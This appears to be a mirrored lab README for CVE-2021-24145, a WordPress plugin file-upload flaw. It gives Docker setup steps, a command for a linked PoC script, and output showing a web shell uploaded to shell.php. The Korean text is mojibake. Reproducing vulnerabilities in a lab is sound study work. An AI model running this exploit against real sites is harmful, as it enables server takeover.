## https://sploitus.com/exploit?id=A7E0CB1F-898C-551C-B6E7-E50EF94F99AB
# CVE-2021-24145
WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5
https://nvd.nist.gov/vuln/detail/CVE-2021-24145
# μ€μΉ λ° μ€ν μμ
#### 1. WordPress μ€μΉ
μ€μΉλ₯Ό μ§νν λ, docker-compose.yml νμΌμμ ν¬νΈν¬μλ©μ μ§νν΄μ£ΌμκΈ° λ°λλλ€.
$ docker-compose up
#### 2. WordPress initial & Plugin installation
http://[web-server ip]:port/λ‘ μ΄λν©λλ€.
κΈ°λ³Έμ μΈ μ€μΉλ₯Ό μ§νν©λλ€.
[Plugins] -> [Add New] -> [Upload Plugin] μ΄λν©λλ€.
modern-events-calendar-lite.5.16.2.zip μ μ
λ‘λ λ° μ€μΉν©λλ€.
μλ νλ©΄μ νλ¬κ·ΈμΈ μ€μΉκ° μλ£λ λͺ¨μ΅μ
λλ€.
μ€μΉκ° μλ£λμμΌλ©΄ νλ¬κ·ΈμΈμ νμ±ν μν΅λλ€.
#### 3. PoC
python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]
$python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456
______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/
* Wordpress Plugin Modern Events Calendar Lite RCE
* @Hacker5preme
[+] Authentication successfull !
[+] Shell Uploaded to: http://172.30.1.48:80//wp-content/uploads/shell.php

# μΆμ²
https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145
# μ£Όμ μ¬ν
#### μ μ·¨μ½μ μ λΆλ²μΌλ‘ μ
μ©ν μ, λ²μ μ±
μμ μ§μ§ μμ΅λλ€.
#### If you illegally exploit the above vulnerabilities, you will not be held liable.
#### docker λ²μ μ μ΅μ ν ν΄μΌ ν©λλ€.